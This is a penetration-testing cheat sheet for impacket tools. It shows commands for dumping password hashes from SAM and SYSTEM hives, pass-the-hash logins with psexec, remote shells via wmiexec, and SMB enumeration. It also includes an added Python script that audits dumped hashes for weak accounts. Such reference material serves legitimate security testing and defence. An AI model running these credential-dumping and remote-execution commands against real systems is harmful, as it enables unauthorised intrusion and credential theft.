impacket
impacket (12.4k β) is a collection of Python classes for working with network protocols. Its example scripts are already installed on Kali:
$ impacket-secretsdump # secretsdump.py
$ ...
You may install them manually too:
$ sudo git clone https://github.com/fortra/impacket /opt/impacket
$ cd /opt/impacket
$ pip install -r requirements.txt
$ pip install .
$ python /opt/impacket/examples/secretsdump.py [...]
Samrdump
List users and domains.
$ impacket-samrdump IP
$ impacket-samrdump username:password@IP
wmiexec
Pop a PowerShell shell or run a single command using DCOM:
$ impacket-wmiexec -shell-type powershell username:password@IP
$ impacket-wmiexec -shell-type powershell username:password@IP "hostname"
mssqlclient
Connect to an MSSQL database.
$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth
SQL> exit
Dump hashes from backup
Dump hashes from a backup of the SAM and SYSTEM hives. The output contains local credentials and domain cached credentials.
$ impacket-secretsdump -sam XXX -system YYY LOCAL
$ impacket-secretsdump -sam XXX -security XXX -system XXX LOCAL
<output format is explained in the output>
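secretsdump prints each SAM entry as uid:rid:lmhash:nthash:::. The following added example (not part of the original page or of impacket) parses saved output and flags blank passwords, stored LM hashes and accounts that share an NT hash; the sample lines and the names parse_sam and audit are assumptions made for illustration.

```python
import re
from collections import defaultdict

# LM and NT hashes of the empty string (well-known constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# SAM entries are printed as uid:rid:lmhash:nthash:::
SAM_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample output; every hash except the two constants above is made up.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
[*] Cleaning up...
"""

def parse_sam(text):
    """Return one dict per SAM entry; banner and status lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts

def audit(accounts):
    """Flag blank passwords, stored LM hashes and NT hashes shared by several accounts."""
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    return {
        "blank_password": [a["user"] for a in accounts if a["nt"] == EMPTY_NT],
        "lm_hash_stored": [a["user"] for a in accounts if a["lm"] != EMPTY_LM],
        "shared_password": sorted(u for nt, u in by_nt.items() if len(u) > 1 and nt != EMPTY_NT),
    }

if __name__ == "__main__":
    for finding, users in audit(parse_sam(SAMPLE)).items():
        print(finding, users)
```

NT hashes are unsalted, so two accounts with the same NT hash have the same password.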
PsExec
Use a hash to log in (Pass-The-Hash).
$ impacket-psexec -hashes LMHASH:NTHASH username@IP
$ impacket-psexec -hashes :NTHASH username@IP
SMB server
Run an SMB server that users connect to with the username XXX and the password YYY. Files will be stored in /path/to/share.
$ impacket-smbserver -smb2support -username XXX -password YYY share_name /path/to/share
$ impacket-smbserver -smb2support share_name /path/to/share
SMB Client
Alternative to smbclient. It works even when the former doesn't.
$ impacket-smbclient 'username':'password'@IP
$ impacket-smbclient IP
# shares
<list of shares>
# use <sharename>
# ls
# tree